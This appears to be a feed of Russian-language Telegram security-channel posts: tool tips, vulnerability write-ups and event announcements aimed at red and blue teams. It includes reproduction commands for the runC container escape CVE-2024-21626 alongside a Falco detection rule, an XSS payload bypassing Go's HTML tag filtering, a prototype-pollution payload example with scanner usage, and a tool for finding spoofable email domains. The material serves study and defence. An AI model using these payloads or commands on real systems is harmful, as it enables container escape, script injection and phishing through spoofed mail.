А вы проверяете DNS записи? (DNSSEC привет)
🌱 Давайте разберем что мы сможем найти, если будет их проверять. Самое вкусное, если у будут отсутствовать SPF и DMARC, это победа на 90%. Но давайте сначала разберем, что это за DNS записи.
1️⃣ SPF — это стандарт, который позволяет владельцам доменов указать, какие почтовые серверы авторизованы для отправки почты от их имени. Запись SPF публикуется в DNS в виде TXT-записи и содержит список IP-адресов, которые разрешены отправлять письма от имени домена. Когда почтовый сервер получает входящее сообщение, он может проверить SPF-запись отправителя, чтобы убедиться, что IP-адрес, с которого было отправлено сообщение, авторизован. Если сообщение было отправлено с сервера, не включенного в SPF-запись, оно может быть отмечено как подозрительное или отклонено.
2️⃣ DMARC — это стандарт, который позволяет владельцу домена указать, какие меры должны быть приняты, если сообщение не прошло проверку SPF или DKIM (еще один стандарт аутентификации). Запись DMARC также публикуется в DNS как TXT-запись и указывает политику, которая должна использоваться для обработки нелегитимных сообщений, а также адрес электронной почты для отправки отчетов о письмах, которые не прошли проверку.
➡️ Как итог мы получаем возможность отправлять email'ы от лица другой компании. Но скоупы у нас частенько составляют больше 20 доменов и проверять всё руками как-то не очень.
🔧 Поэтому делюсь с вами классной тулзой, которая автоматизирует эту рутинную задачу - Spoofy. Инструмент проверяет можно ли спуфать электронную почту на основе SPF и DMARC записей.
Предустановка:
Установка максимально простая:
Тулза подходит для 🔴 🔵 команд
🌚 @poxek
Предустановка:
git clone https://github.com/MattKeeley/Spoofy; cd Spoofy; pip3 install -r requirements.txt
Установка максимально простая:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]
Тулза подходит для 🔴 🔵 команд
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Заметки Слонсера (Slonser)
Уже в эти выходные моя команда проводит GoldCTF 2024.
Будет очень сложный Attack/Defence, приглашаю всех поучаствовать.
https://ctftime.org/event/2249
Будет очень сложный Attack/Defence, приглашаю всех поучаствовать.
https://ctftime.org/event/2249
ctftime.org
GoldCTF 2024
Online open-to-all Attack-Defence for gold diggers willing to spend their lifes ingloriously hitting stones with pick...
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Немного отвлекусь от повседневности и хочу рассказать про то, как нам важно иметь безопасные контейнеры. Начну с того, что Вам и так известно, недавно был найден скоуп уязвимостей Docker и runC.
Для начала что это за уязвимости:
При подготовке поста мне очень понравилось читать исследование про CVE-2024–21626, прошу всех с ним ознакомиться - ТЫК
Могу сделать отдельный перевод в teletype🚶♀️
CVE-2024-21626, в частности, привлекла внимание к уязвимостям в runC, ключевом компоненте различных систем управления контейнерами с открытым исходным кодом. Эта уязвимость, а также ее аналоги в BuildKit подчеркивают проблемы, связанные с обеспечением безопасности контейнеров и всей современной микросервисной инфраструктуре.
RunC - это стандартное время выполнения контейнеров. Это базовая технология, используемая в Docker и других платформах для запуска контейнеров. По сути, runC отвечает за порождение и запуск контейнеров в соответствии со спецификацией Open Container Initiative (OCI). Для этого он предоставляет интерфейс командной строки для управления жизненным циклом контейнеров.
Суть CVE-2024-21626 заключается в утечке дескриптора файла в пакете runC. Эта проблема возникает во время выполнения контейнерного кода. Хотя пользователи обычно устанавливают закрытие дескрипторов файлов при выполнении
(O_CLOEXEC) для предотвращения утечки, уязвимость существует в том, как runC обрабатывает системный вызов setcwd(2). Сложно, непонятно, но вот ссылки на видосы исполнения от Snyk ТЫК и на гите ТЫКНет необходимости создавать собственный образ, просто запустите контейнер с параметром -w:
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
~/container/runc/runc --version
docker run --name helper-ctr alpine
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
~/container/runc/runc spec
sed -ri 's#(\s*"cwd": )"(/)"#\1 "/proc/self/fd/7"#g' config.json
grep cwd config.json
sudo ~/container/runc/runc --log ./log.json run demo
Эксплойты имеют следующие особенности:
execve(2) со специальным рабочим каталогом, который начинается с /proc/self/fd/.symlink(2) или symlinkat(2) со специальной ссылкой на целевой каталог, который начинается с /proc/self/fd/.open(2), openat(2) или openat2(2) с именами типа /proc/\d+/cwd/.*.Правило для Falco — про него выйдет отдельный пост
- macro: container
condition: (container.id != host and container.name exists)
- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
desc: >
Detect CVE-2024-21626, runC escape vulerability through /proc/[PID]/cwd.
condition: >
container and ((evt.type = execve and proc.cwd startswith "/proc/self/fd") or (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")) and proc.name != "runc:[1:CHILD]"
output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
priority: CRITICAL
Это первая часть поста, телега не позволяет дать больше информации. Вторая часть выйдет завтра, в 15:00
Всех ждем на продолжение на уязвимости CVE-2024–23651, CVE-2024–23652, CVE-2024–23653
Please open Telegram to view this post
VIEW IN TELEGRAM
История о багах и о том, как фикс одних багов, создает новые баги 😂
Много видел постов про суперкритичную вулну в Ivanti. В целом интересная уязвимость, но это только верхушка айсберга.
Поэтому решил поделиться не просто PoC, но и ресерчом от AttackerKB (создатели metasploit). Они интересно и понятно объясни, как нашли и как работает злополучная SSRF в Ivanti Connect Secure, Ivanti Policy Secure, Ivanti Neurons for ZTA.
Но начнем мы не с CVE-2024-21893, а сделаем несколько шагов назад)
0️⃣ История с Ivanti началась с CVE-2023-46805, это был authentication bypass. Импакт очевиден, но ресерчеры на этом не остановились.
1️⃣ Далее они нашли command injection CVE-2024-21887. Это было вкуснее, к тому же чейнилось с предыдущей вулной на обход аутентификации. Что вылилось в unauthenticated RCE.
2️⃣ Ivanti пофиксили эти две CVE. Но официального патча на момент ещё не вышел.
3️⃣ Затем вышел официальный патч 1 февраля, но ресерчеры успели найти ту самую SSRF CVE-2024-21893 на день раньше, то бишь 31 января). Данная SSRF позволяет обойти патч двух предыдущих CVE (CVE-2023-46805 & CVE-2024-21887).
Есть ли в итоге исправление?
Да, конечно. В актуальной версии 22.5R2.2, на момент написания статьи, данные уязвимости были устранены. Но если у вас Ivanti Connect Secure 22.3R1 или старше, то рекомендую обновиться до актульной версии ASAP.
➡️ А для тех, кто хочет ещё глубже погрузится в этом, советую почитать полный ресерч.
Итог истории очевиден. Фикся одни баги, создаем другие)
🥺 Stay secure!
🌚 @poxek
Много видел постов про суперкритичную вулну в Ivanti. В целом интересная уязвимость, но это только верхушка айсберга.
Поэтому решил поделиться не просто PoC, но и ресерчом от AttackerKB (создатели metasploit). Они интересно и понятно объясни, как нашли и как работает злополучная SSRF в Ivanti Connect Secure, Ivanti Policy Secure, Ivanti Neurons for ZTA.
Но начнем мы не с CVE-2024-21893, а сделаем несколько шагов назад)
Есть ли в итоге исправление?
Да, конечно. В актуальной версии 22.5R2.2, на момент написания статьи, данные уязвимости были устранены. Но если у вас Ivanti Connect Secure 22.3R1 или старше, то рекомендую обновиться до актульной версии ASAP.
Итог истории очевиден. Фикся одни баги, создаем другие)
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AP Security
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Perfect DLL Hijacking. Разбор техники
Привет, Хабр, на связи лаборатория кибербезопасности компании AP Security! В статье речь пойдет о такой технике, как DLL Hijacking, а именно как это работает от А до Я. DLL Hijacking - это...
Forwarded from Заметки Слонсера (Slonser)
Недавно нашел обход фильтрации тегов в golang.
Для строки
То есть он будет думать что у нас есть только ссылка на google.com
В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert
Баг существует в последней версии golang и будет исправлен в next релизе.
Для строки
<a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a>, golang net/html увидит следующий DOM:html
head
body
a
->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1>
То есть он будет думать что у нас есть только ссылка на google.com
В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert
Баг существует в последней версии golang и будет исправлен в next релизе.
Что общего у 50-секундного детектива, баскетболистов и разработки фишинговых атак
#история #фишинг
Спойлерить статью не буду, но редактор очень креативно подошла к теме Awareness. Поэтому всем советую почитать эту статью)
➡️ Читать далее
🌚 @poxek
#история #фишинг
Спойлерить статью не буду, но редактор очень креативно подошла к теме Awareness. Поэтому всем советую почитать эту статью)
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Багхантер
😎 Поступила инфа, что 18 апреля у VK намечается закрытая тусовка для багхантеров.
А еще узнали про условие, как туда можно попасть: любой багхантер, который сдаст четыре и более оплачиваемых отчета по программам VK на платформе Standoff 365 в срок с 12 февраля по 11 апреля, — получит приглашение на ивент.
А чтобы искать уязвимости было еще интереснее, VK увеличивает выплаты по программам: VK Play, Чемпионаты VK, VK Реклама, VK Pay и Оператор рекламных данных.
Сделай дело — туси смело: https://bugbounty.standoff365.com/vendors/vk/
А еще узнали про условие, как туда можно попасть: любой багхантер, который сдаст четыре и более оплачиваемых отчета по программам VK на платформе Standoff 365 в срок с 12 февраля по 11 апреля, — получит приглашение на ивент.
А чтобы искать уязвимости было еще интереснее, VK увеличивает выплаты по программам: VK Play, Чемпионаты VK, VK Реклама, VK Pay и Оператор рекламных данных.
Сделай дело — туси смело: https://bugbounty.standoff365.com/vendors/vk/
Forwarded from BI.ZONE Bug Bounty
Скоро VK проведет закрытое мероприятие для багхантеров. Пока никаких спойлеров: компания сама расскажет все подробности.
Зато уже сейчас у вас есть шанс получить проходку на ивент. Для этого нужно сдать как минимум четыре оплачиваемых бага с 12 февраля по 11 апреля. Успейте принять участие: количество мест ограниченно!
Но это еще не все: чтобы багхантить было приятнее, с 12 февраля VK повышает выплаты в своих программах.
Перейти на платформу
Please open Telegram to view this post
VIEW IN TELEGRAM
0 == "0" — TRUE
❤️ Prototype Pollution — это атака, с помощью которой изменяют прототип базовых объектов (
➡️ Тут можете более подробно почитать про Prototype Pollution
❤️ Но как же я могу вас оставить без автоматизации))
pphack
Прокаченный сканер на Prototype Pollution.
Установка:
FAQ:
Использование:
также вы можете встроить его в свой pipeline
❤️ #You_have_been_poxeked
🌚 @poxek
Object.prototype, Function.prototype, Array.prototype) для модификации хода выполнения программы. Например, если код обращается к свойству window.foo и выполняет его содержимое с помощью eval, то в некоторых ситуациях можно добиться выполнения произвольного кода, переписав в прототипе объекта свойство foo (Object.prototype.foo = 'alert(1)'). Чаще всего на клиенте prototype pollution используется для реализации XSS с помощью изменения GET-параметров.pphack
Прокаченный сканер на Prototype Pollution.
Установка:
go install github.com/edoardottt/pphack/cmd/pphack@latest
FAQ:
Usage:
pphack [flags]
Flags:
INPUT:
-u, -url string Input URL
-l, -list string File containing input URLs
CONFIGURATION:
-c, -concurrency int Concurrency level (default 50)
-t, -timeout int Connection timeout in seconds (default 10)
-px, -proxy string Set a proxy server (URL)
-rl, -rate-limit int Set a rate limit (per second)
-ua, -user-agent string Set a custom User Agent (random by default)
SCAN:
-p, -payload string Custom payload
-js, -javascript string Run custom Javascript on target
-jsf, -javascript-file string File containing custom Javascript to run on target
OUTPUT:
-o, -output string File to write output results
-v, -verbose Verbose output
-s, -silent Silent output. Print only results
Использование:
pphack -u https://edoardottt.github.io/pp-test/
pphack -l targets.txt
также вы можете встроить его в свой pipeline
echo https://edoardottt.github.io/pp-test/ | pphack
cat targets.txt | pphack
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from CTF News
⚡Пс-с, тут отчет по Gold CTF подвезли!
Еще раз поздравляем команду kks с заслуженной победой. Напоминаем, что ребята выиграли по тройской унции золота на каждого тиммейта 🔥
Отчет на сайте
Репозиторий
Еще раз поздравляем команду kks с заслуженной победой. Напоминаем, что ребята выиграли по тройской унции золота на каждого тиммейта 🔥
Отчет на сайте
Репозиторий
Forwarded from Cyber Media
Пивотинг — это набор техник, которые позволяют атакующему получить доступ к внутренним ресурсам, минуя сетевые средства защиты.
Please open Telegram to view this post
VIEW IN TELEGRAM
#AMA
Что такое AMA (Ask Me Anything) эфир? Стрим, когда вы мне сможете задавать любые адекватные и даже личные вопросы в разумных рамках. Подобное уже делал уважаемый @CuriV на своем канале @pathsecure.
Буду благодарен коллегам за репост!
Please open Telegram to view this post
VIEW IN TELEGRAM
С 14 февраля всех :)
section .data
msg db 'I love cybersecurity', 0xA
len equ $ - msg
section .text
global _start
_start:
mov eax, 4
mov ebx, 1
mov ecx, msg
mov edx, len
int 0x80
mov eax, 1
xor ebx, ebx
int 0x80
Признавайтесь! Кто любит фолзы? Правильно, никто :)
Поэтому делюсь с вами Living off the False Positive. Это автогенерируемая коллекция ложных срабатываний, взятых из некоторых наиболее популярных наборов правил. Информация классифицирована по методам ATT&CK, источнику правил и источнику данных. Записи включают детали связанных правил, а также их описание и логику обнаружения.
Цель состоит в том, чтобы предоставить эту информацию как красным, так и синим командам. Красные команды могут использовать эту информацию для маскировки, а синие - для оценки слабых мест в своей логике обнаружения. Интересно, что эта информация также может помочь при сортировке и расследовании предупреждений, позволяя выявить общие False Positive, связанные с определенными методами и источниками данных.
➡️ https://br0k3nlab.com/LoFP/
🌚 @poxek
Поэтому делюсь с вами Living off the False Positive. Это автогенерируемая коллекция ложных срабатываний, взятых из некоторых наиболее популярных наборов правил. Информация классифицирована по методам ATT&CK, источнику правил и источнику данных. Записи включают детали связанных правил, а также их описание и логику обнаружения.
Цель состоит в том, чтобы предоставить эту информацию как красным, так и синим командам. Красные команды могут использовать эту информацию для маскировки, а синие - для оценки слабых мест в своей логике обнаружения. Интересно, что эта информация также может помочь при сортировке и расследовании предупреждений, позволяя выявить общие False Positive, связанные с определенными методами и источниками данных.
Please open Telegram to view this post
VIEW IN TELEGRAM